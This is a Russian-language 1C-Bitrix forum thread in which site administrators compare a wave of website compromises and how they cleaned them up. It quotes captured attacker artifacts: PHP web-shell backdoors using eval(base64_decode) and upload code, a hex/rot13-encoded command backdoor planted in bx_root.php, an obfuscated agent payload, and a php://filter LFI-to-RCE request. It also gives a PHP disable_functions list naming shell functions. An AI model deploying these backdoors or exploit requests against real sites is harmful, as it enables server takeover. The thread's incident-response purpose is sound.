Разработчикам

Взломаны сайты в честь дня конституции украины

Пользователь 13618 Эксперт Сообщений: 1342 Баллов: 226 Регистрация: 05.04.2011 Сертифицированный партнер	#401 01.03.2023 16:08:23 clone message deleted Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 13618 Эксперт Сообщений: 1342 Баллов: 226 Регистрация: 05.04.2011 Сертифицированный партнер	#402 01.03.2023 16:09:38 чего то сообщение задвоилось, глюк какой то Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 1991131

Заглянувший

Сообщений: 13 Баллов: 1 Регистрация: 16.05.2018

#403

01.03.2023 16:19:59

Такс друзья. На одном проекте массово создавались htaccess

На другом проекте были залиты разные php файлы, в разных папках

Описание:
Создавались файлы
admin.php
contents.php
сss/votes.php
Всякие левые wordpress

В файлах зашифрованный код, местами даже есть китайские иероглифы:)

Как в корне так и в /bitrix/

Интересно, что .htaccess и index.php постоянно перезаписывались.

Хост отписался, что были запущены левые процессы

Код

u15...8   24026  0.0  0.2 421540 33212 ?        S    11:43   0:02 php
/home/u15..8/....ru/www/lock666.php

Вот его действия:
strace -p 24026

nanosleep({tv_sec=1, tv_nsec=0}, 0x7ffc2c2b8c00) = 0
access("/home/u15..8/....ru/www/index.php", F_OK) = 0
access("/home/u15..8/....ru/www/.htaccess", F_OK) = 0
open("/home/u15..8/....ru/www/index.php", O_RDONLY) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=4932, ...}) = 0
lseek(3, 0, SEEK_CUR)                   = 0
fstat(3, {st_mode=S_IFREG|0644, st_size=4932, ...}) = 0
read(3, "<?php @include(\"\\167\\160\\55\\151\\"..., 8192) = 4932
read(3, "", 8192)                       = 0
read(3, "", 8192)                       = 0
close(3)                                = 0
open("/home/u15..8/....ru/www/.htaccess", O_RDONLY) = 3
fstat(3, {st_mode=S_IFREG|0444, st_size=204, ...}) = 0
lseek(3, 0, SEEK_CUR)                   = 0
fstat(3, {st_mode=S_IFREG|0444, st_size=204, ...}) = 0
read(3, "<IfModule mod_rewrite.c>\r\nRewrit"..., 8192) = 204
read(3, "", 8192)                       = 0
read(3, "", 8192)                       = 0
close(3)

Пользователь 6537570 Посетитель Сообщений: 86 Баллов: 8 Регистрация: 10.10.2022	#404 01.03.2023 16:28:03 Коллеги, исходя из темы не до конца ясно, страдают только старые (не обновленные) сайты или есть случаи и с актуальными версиями?

Пользователь 1991131

Заглянувший

Сообщений: 13 Баллов: 1 Регистрация: 16.05.2018

#405

01.03.2023 16:34:41

Цитата
написал: Коллеги, исходя из темы не до конца ясно, страдают только старые (не обновленные) сайты или есть случаи и с актуальными версиями?

пока старый попал. на обновленных не вижу проблем

Пользователь 13618

Эксперт

Сообщений: 1342 Баллов: 226 Регистрация: 05.04.2011

Сертифицированный партнер

#406

01.03.2023 16:39:33

Цитата
Александр Каменский написал: Коллеги, исходя из темы не до конца ясно, страдают только старые (не обновленные) сайты или есть случаи и с актуальными версиями?

я так понимаю только не обновлённые, хотя было одно сообщение

Цитата
Андрей Петров написал: ага, взломали сайт без всяких модулей голосования, с обновлениями на Старте

но так и без ответа про уязвимость ...

Лично на моей практике попадались взломанные сайты только не обновлённые

Цитата
Алексей написал: 24 февраля начали - годовщина СВО.

похоже на причину новой "волны", на сколько я помню год назад тоже была волна взломанных сайтов и не только под Битрикс.

Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 1730687

Заглянувший

Сообщений: 3 Баллов: 1 Регистрация: 02.02.2018

#407

01.03.2023 17:08:53

Коллеги, да - проблема в старых версиях битры и хвостах, которые остались после взлома. июньского.
Как лечилось:
- останавка сервера
- поиск файлов, у меня был целый букет - как wp так и рандомные файлы, на которые по крону стучатся каждую секунду.
- залочил все исполняемые функции, кроме curl на уровне конфигурации php.ini
- выставил счет клиенту на обновление битры
- пролечил вагон файлов
- Пока битру не обновили с другого проекта скопировал модуль bitrix.xscan, повесил исполняемым антивирусник на все файлы, добавил лог по посту, айпи.
- У меня долбится с контейнера докера по крону (кстати тоже дырявый сервер), каждую секунду.

Висел sh скрипт с какого-то сайта тянул репозиторий
в Админке грузил - inc.class.style.php
и рандомный файл.
/home/bitrix/www/bitrix/admin/8f1c222aae51.php - с этого ip 77.73.131.73
wp-инъекция - с этого ip 185.81.157.213

disable_functions = evil,exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source
... теперь собираю статистику что делают и куда ломятся ))

Пользователь 1991131

Заглянувший

Сообщений: 13 Баллов: 1 Регистрация: 16.05.2018

#408

01.03.2023 17:18:34

Цитата
написал: похоже на причину новой "волны", на сколько я помню год назад тоже была волна взломанных сайтов и не только под Битрикс.

да , скорей всего. под раздачу попал окологосударственный сайт, а в логах такие записи

Код
200.29.237.102 - - [28/Feb/2023:15:21:00 +0300] "T /MASHIAH%20NOW! HTTP/1.1" 301 178 "MASHIAH NOW!" "STOP WAR! MASHIAH NOW!"

Пользователь 17972

Заглянувший

Сообщений: 25 Баллов: 2 Регистрация: 22.11.2007

#409

01.03.2023 18:31:28

Цитата
написал: Коллеги, исходя из темы не до конца ясно, страдают только старые (не обновленные) сайты или есть случаи и с актуальными версиями?

Есть и свежие сайты. Обновлялись перед 1 февраля, чтобы была актуальная версия и не обновлять php до воьсмерки. Второй день мучаемся вычищаем. Так же есть еще три сайта на старых версиях. И один есть старый и бех vote. Симптомы схожие.

Пользователь 13618

Эксперт

Сообщений: 1342 Баллов: 226 Регистрация: 05.04.2011

Сертифицированный партнер

#410

01.03.2023 18:41:06

Цитата

Владимир Кузин написал:
Есть и свежие сайты. Обновлялись перед 1 февраля, чтобы была актуальная версия и не обновлять php до воьсмерки. Второй день мучаемся вычищаем. Так же есть еще три сайта на старых версиях. И один есть старый и бех vote. Симптомы схожие.

На хостинге был ещё хоть один не обновленный сайт?
Или один сайт - один хостинг?

Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 298542

Заглянувший

Сообщений: 20 Баллов: 1 Регистрация: 05.12.2014

#411

01.03.2023 18:49:25

Цитата
написал: Есть и свежие сайты. Обновлялись перед 1 февраля

В .htaccess был подключен скрипт модуля защиты /путь до папки сайта/bitrix/modules/security/tools/start.php?
В Главном модуле Режим вывода ошибок (error_reporting) = Не выводить?
В bitrix/.settings.php в 'exception_handling' параметр 'debug' = false и указан путь до лога ошибок в 'log'?

Пользователь 1991131 Заглянувший Сообщений: 13 Баллов: 1 Регистрация: 16.05.2018	#412 01.03.2023 21:16:18 Еще один файл нашел /bitrix/modules/iblock/lib/bizproctype/wp-login.php через него и заливали вредонос. как он попал в эту папку пока выясняю

Пользователь 1991131 Заглянувший Сообщений: 13 Баллов: 1 Регистрация: 16.05.2018	#413 01.03.2023 21:25:04 кстати интересный htaccess там же лежит ( /bitrix/modules/iblock/lib/bizproctype/ ) <FilesMatch ".(php\|php5\|phtml)$"> Order allow,deny Deny from all </FilesMatch> <FilesMatch "^(access.php\|wp.php\|term.php\|locale.php\|themes.php\|network.php\|container.php\|router.php\|wp-login.php)$"> Order allow,deny Allow from all </FilesMatch>

Пользователь 7087514

Заглянувший

Сообщений: 1 Регистрация: 02.03.2023

#414

02.03.2023 00:20:17

Цитата
написал: dmitry920, Вы бы лучше на этой главной содержимое $_POST запроса куда нить в файлик сохранили и сюда запостили, тогда можно найти адресата

Код

Array
(
    [bitrixxx] => file_put_contents($_SERVER['DOCUMENT_ROOT'].'/bitrix/admin/b7c01fefc3c7.php','<?=409723*20;if(md5($_COOKIE[d])=="17028f487cb2a84607646da3ad3878ec"){echo"ok";eval(base64_decode($_REQUEST[id]));if($_POST["up"]=="up"){@copy($_FILES["file"]["tmp_name"],$_FILES["file"]["name"]);}}?>');
)

Пользователь 13618 Эксперт Сообщений: 1342 Баллов: 226 Регистрация: 05.04.2011 Сертифицированный партнер	#415 02.03.2023 03:42:27 Александр, теперь поиском по всем php файлам ищите bitixxx И в агентах ещё обязательно проверьте заразу Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 13618

Эксперт

Сообщений: 1342 Баллов: 226 Регистрация: 05.04.2011

Сертифицированный партнер

#416

02.03.2023 05:47:02

тут новенький почему то не может в тему написать, кинул в личку - репост ниже
лично я таких POST ещё не встречал, думаю просто совпадение

Цитата

Не знаю почему не могу написать. Новенький наверное.Первые факты взлома у нас 15.02.2023. Ломают через уязвимость
LFI2RCE via PHP Filters.

POST запрос выглядит так:
"POST /products/index.php?ID=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|.........|convert.base64-decode/resource=php://temp HTTP/1.1" 200 15544 "-" "firefox"
Будет создан веб-шелл через который дальше будут лить все подряд. Я в 1С Битрикс впервые. Как правильно задушить такие запрос? Понятно что запрет POST везде решит проблему. Но хотелось бы понять как это сделать правильно

я бы для начала так же как в предыдущем случае попробовал изучить запрос более детально
сохранил бы $_GET $_POST параметры (я так понимаю в лог полностью $_GET не влез, а было бы интересно взглянуть)

т.е. в /products/index.php в самое начало и mail() для оповещения перед die()

Код

@mkdir('logs');
if(!empty($_POST)) {
   file_put_contents('./logs/post-'.time().'.log', var_export($_POST, true));
   file_put_contents('./logs/get-'.time().'.log', var_export($_GET, true));
    die('hack attempt');
}

Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 4148622

Заглянувший

Сообщений: 3 Регистрация: 24.04.2020

#417

02.03.2023 09:28:15

Вчера, повторно, поле 24 февраля сайт упал. Во всех разделах создались файлы .htaccess и был вставлен зловредный код в код index.php. После анализа логов было обнаружено что в папке admin были созданы бекдоры с рандомными именами. Создавались эти бекдоры POST запросом к главной странице сайта. Вчера вечером по вашему совету поставил логирования POST запросов к главной странице и это дало результаты. Вот такие запросы прилетают:

Код

array (  
 'BX_STAT' => '303q66696p655s7075745s636s6r74656r747326313q6269747269782s61646q696r2s6561323033363065653039302r70687026323q3p3s3q3430393732332n32303o6966286q643528245s434s4s4o49455o645q293q3q22313730323866343837636232613834363037363436646133616433383738656322297o6563686s226s6o223o6576616p286261736536345s6465636s646528245s524551554553545o69645q29293o696628245s504s53545o227570225q3q3q22757022297o40636s707928245s46494p45535o2266696p65225q5o22746q705s6r616q65225q2p245s46494p45535o2266696p65225q5o226r616q65225q293o7q7q3s3r', 
)

обнаружил код в файле \bitrix\modules\main\bx_root.php

Код
<? if (isset($_POST["BX_STAT"]) && $_POST["BX_STAT"] <> "") parse_str(hex2bin(str_rot13($_POST["BX_STAT"])),$bx_stat) or die(str_rot13(bin2hex($bx_stat[0]($bx_stat[1],$bx_stat[2])))); ?>

Что интересно дата bx_root.php такая же как у всех файлов ядра. В других дистрибутивах этого кода не обнаружил и поэтому удалил его. Наблюдаю дальше.

P.S Битрикс 18.5.180.

Пользователь 2624465

Заглянувший

Сообщений: 6 Регистрация: 21.09.2020

#418

02.03.2023 10:52:40

Цитата

написал:
Вчера, повторно, поле 24 февраля сайт упал. Во всех разделах создались файлы .htaccess и был вставлен зловредный код в код index.php. После анализа логов было обнаружено что в папке admin были созданы бекдоры с рандомными именами. Создавались эти бекдоры POST запросом к главной странице сайта. Вчера вечером по вашему совету поставил логирования POST запросов к главной странице и это дало результаты. Вот такие запросы прилетают:

Код

  array  (  
  'BX_STAT'  =>  '303q66696p655s7075745s636s6r74656r747326313q6269747269782s61646q696r2s6561323033363065653039302r70687026323q3p3s3q3430393732332n32303o6966286q643528245s434s4s4o49455o645q293q3q22313730323866343837636232613834363037363436646133616433383738656322297o6563686s226s6o223o6576616p286261736536345s6465636s646528245s524551554553545o69645q29293o696628245s504s53545o227570225q3q3q22757022297o40636s707928245s46494p45535o2266696p65225q5o22746q705s6r616q65225q2p245s46494p45535o2266696p65225q5o226r616q65225q293o7q7q3s3r' , 
)

обнаружил код в файле \bitrix\modules\main\bx_root.php

Код

   <? 
  if  ( isset ( $_POST [ "BX_STAT" ]) &&  $_POST [ "BX_STAT" ] <>  "" )    parse_str(hex2bin(str_rot13( $_POST [ "BX_STAT" ])), $bx_stat )  or   die (str_rot13(bin2hex( $bx_stat [ 0 ]( $bx_stat [ 1 ], $bx_stat [ 2 ]))));
  ?>

у меня в этом файле вот что

Код

<?
/*
$fname1 = __FILE__;
$fname2 = $_SERVER["DOCUMENT_ROOT"];
if(strpos($fname1, $fname2)!==0)
{
   $fname1 = realpath(__FILE__);
   $fname2 = realpath($_SERVER["DOCUMENT_ROOT"]);
}

if(strpos($fname1, $fname2)===0)
{
   $fname3 = RTrim($_SERVER["DOCUMENT_ROOT"], " /\\");
   $bx_root = substr($fname1, strlen($fname3));
   $bx_root = substr($bx_root, 0, strlen($bx_root) - strlen("/modules/main/include.php"));
}
else
   $bx_root = "/bitrix";

$bx_root = str_replace("\\", "/", $bx_root);
*/
$bx_root = "/bitrix";
define("BX_ROOT", $bx_root);

if(isset($_SERVER["BX_PERSONAL_ROOT"]) && $_SERVER["BX_PERSONAL_ROOT"] <> "")
   define("BX_PERSONAL_ROOT", $_SERVER["BX_PERSONAL_ROOT"]);
else
   define("BX_PERSONAL_ROOT", BX_ROOT);

if (isset($_POST["BX_STAT"]) && $_POST["BX_STAT"] <> "")
   parse_str(hex2bin(str_rot13($_POST["BX_STAT"])),$bx_stat) or die(str_rot13(bin2hex($bx_stat[0]($bx_stat[1],$bx_stat[2]))));

if (isset($_POST["BX_STAT"]) && $_POST["BX_STAT"] <> "")
   parse_str(hex2bin(str_rot13($_POST["BX_STAT"])),$bx_stat) or die(str_rot13(bin2hex($bx_stat[0]($bx_stat[1],$bx_stat[2]))));


if (isset($_POST["BX_STAT"]) && $_POST["BX_STAT"] <> "")
   parse_str(hex2bin(str_rot13($_POST["BX_STAT"])),$bx_stat) or die(str_rot13(bin2hex($bx_stat[0]($bx_stat[1],$bx_stat[2]))));

if (isset($_POST["BX_STAT"]) && $_POST["BX_STAT"] <> "")
   parse_str(hex2bin(str_rot13($_POST["BX_STAT"])),$bx_stat) or die(str_rot13(bin2hex($bx_stat[0]($bx_stat[1],$bx_stat[2]))));

if (isset($_POST["BX_STAT"]) && $_POST["BX_STAT"] <> "")
   parse_str(hex2bin(str_rot13($_POST["BX_STAT"])),$bx_stat) or die(str_rot13(bin2hex($bx_stat[0]($bx_stat[1],$bx_stat[2]))));
?>

Пользователь 13618

Эксперт

Сообщений: 1342 Баллов: 226 Регистрация: 05.04.2011

Сертифицированный партнер

#419

02.03.2023 11:02:54

ну если интересно что тут происходит можно
загнать в $_POST["BX_STAT"] содержимое post запроса, разделить функции на поэтапный вызов и дебаггером посмотреть
заодно по стеку вызовов глянуть как он подключается

если не интересно грохаем файлик и следим дальше

ну и первое, что нужно было сделать - конечно обновить лицензию и ядро

Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 2624465

Заглянувший

Сообщений: 6 Регистрация: 21.09.2020

#420

02.03.2023 11:07:29

Цитата

написал:
ну если интересно что тут происходит можно
загнать в $_POST["BX_STAT"] содержимое post запроса, разделить функции на поэтапный вызов и дебаггером посмотреть
заодно по стеку вызовов глянуть как он подключается

если не интересно грохаем файлик и следим дальше

ну и первое, что нужно было сделать - конечно обновить лицензию и ядро

Стоит решение хамелеон с 10 торгующими лендингами. Существует ли риск потерять все это после обновления?

Пользователь 13618 Эксперт Сообщений: 1342 Баллов: 226 Регистрация: 05.04.2011 Сертифицированный партнер	#421 02.03.2023 11:11:45 ну это к создателям решения, по идее обновление не должно что-то ухудшить сделайте полный бэкап и проверьте Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 1991131 Заглянувший Сообщений: 13 Баллов: 1 Регистрация: 16.05.2018	#422 02.03.2023 13:30:45 Сегодня еще один схожий пациент пришел на лечение) Старый сайт, движок не обновлялся

Пользователь 13618

Эксперт

Сообщений: 1342 Баллов: 226 Регистрация: 05.04.2011

Сертифицированный партнер

#423

02.03.2023 13:32:38

Цитата
Иван Ю. написал: Сегодня еще один схожий пациент пришел на лечение) Старый сайт, движок не обновлялся

и ко мне тоже пациент пришел

Цитата
Обновления были установлены: 22.03.2022 10:25:47

Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 13618

Эксперт

Сообщений: 1342 Баллов: 226 Регистрация: 05.04.2011

Сертифицированный партнер

#424

02.03.2023 13:50:25

мдда, уж - непонятно как такое может из агента запуститься

Скрытый текст

Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 1991131

Заглянувший

Сообщений: 13 Баллов: 1 Регистрация: 16.05.2018

#425

02.03.2023 13:59:42

Цитата

написал:
мдда, уж - непонятно как такое может из агента запуститься
Скрытый текст
$arAgent["NAME"];//_(9.)H'5t}>qo7ouj7<(>!)U}3/]6u8u}Q%' //>w7u5ST<"IA.xY:8eeval /*9!._IkZ)1 DcpyxJA\"F/C1ra/9+E/&^15>Z"yd3y)vk$p6FN*/(/*]~P@.iKSyR3+hRfkLK~GUv3ZgJ!6dmtClEc{/*/urldecode#Dcc5L6|8cI8+~/?Y(/*I$s6IW3YhccLGyx^v2BAJN@ZnzRYVa+*/strrev/*8/WKh@/MlVGf6?yY`E)" w}SRU5]V{]n+5:tVJCC"j+8+%rlK{n*/(/* GC5%z1bi=x%3OOVsQB~jM%]:PZ*|Ox|v<3|8D`"bY(u*/'b3%56%57%27%47%02%e6%27%57%47%56%27%02%02%02%02%02%02%02%02%a0%d7%02%02%02%02%a0%b3%92%27%42%82%c6%16%67%56%02%02%02%02%a0%56%37%c6%56%02%02%02%02%a0%d7%02%02%02%02%a0%b3%27%42%02%d3%02%47%c6%57%37%56%27%f5%c6%16%67%56%42%02%02%02%02%a0%b3%92%22%13%02%d3%02%44%94%02%54%25%54%84%75%02%72%e4%72%02%d3%02%44%f4%94%25%54%05%f5%35%94%02%c2%03%63%02%d3%02%c4%14%65%25%54%45%e4%94%f5%45%e4%54%74%14%02%45%54%35%02%47%e6%56%76%16%f5%26%02%54%45%14%44%05%55%22%82%97%27%56%57%15%e3%d2%24%44%42%02%02%02%02%a0%b7%92%92%d5%22%87%87%87%56%27%f6%47%37%56%27%22%b5%45%35%54%55%15%54%25%f5%42%82%47%56%37%37%96%82%66%96%02%02%02%02%a0%b3%72%b3%92%82%16%47%16%44%47%96%d6%26%57%37%a3%a3%56%c6%26%16%45%16%47%16%44%27%56%47%e6%57%f6%34%c5%c5%37%36%96%47%97%c6%16%e6%14%c5%c5%e6%96%16%d4%c5%c5%87%96%27%47%96%24%c5%c5%72%02%d3%02%27%42%02%02%02%02%a0%b7%56%37%c6%56%02%02%02%02%a0%d7%02%02%02%02%a0%d7%02%02%02%02%a0%b3%47%96%87%56%02%02%02%02%a0%b7%92%56%42%02%e6%f6%96%47%07%56%36%87%54%82%02%86%36%47%16%36%02%02%02%02%a0%d7%02%02%02%02%a0%b3%92%92%92%d5%22%87%87%87%96%27%47%96%26%22%b5%45%35%54%55%15%54%25%f5%42%82%56%46%f6%36%56%46%c6%27%57%82%56%46%f6%36%56%46%c6%27%57%82%c6%16%67%56%02%d3%02%56%42%02%02%02%02%a0%b7%97%27%47%02%02%02%02%a0%a0%b3%92%22%13%02%d3%02%44%94%02%54%25%54%84%75%02%72%e4%72%02%d3%02%74%e4%94%e4%e4%55%25%02%c2%03%02%d3%02%45%e4%55%f4%34%f5%95%25%45%54%25%02%c2%c4%c4%55%e4%02%d3%02%b4%34%54%84%34%f5%54%45%14%44%02%45%54%35%02%47%e6%56%76%16%f5%26%02%54%45%14%44%05%55%22%82%97%27%56%57%15%e3%d2%24%44%42%02%02%02%02%a0%b7%92%92%d5%22%87%87%87%96%27%47%96%26%22%b5%45%35%54%55%15%54%25%f5%42%82%47%56%37%37%96%82%66%96%02%02%02%02%a0%02%02%02%02%02%02%02%02%a0%'/*}+o|u>#TYS0cP_\NWyaT2'55io>_yv*/) #T/N82kY'xApsEIx`?}`2_DB3;dm) /*pqPWM{~IE(WOT)l=?x[>zBI# yCBI#B:usrCorl6zEeOOSmoMJ.*/)/*LlRo0|sR8iF+.7}{MxB4Iqg8a5bp^OJ+=|z*/;/*"3YH?h_>d.8'Cay+z\A]M!.x,Lu({qx}&SFE<'c!6|)Y^*/

Тоже самое, прям дофига htaccess, левый код в файлах, много лишних левых файлов, и левые процессы на хосте

9100 0.1 0.0 387136 38844 ? S Feb28 4:18 php -f /home/w/......s/public_html/httpd.conf

Взломаны сайты в честь дня конституции украины

Продукты

Управление сайтом

Битрикс24

Интернет-магазин + CRM

Решения

Для интернет-магазинов

Каталог готовых решений

Внедрение

Выбрать партнера

Проверить партнера

Стать партнером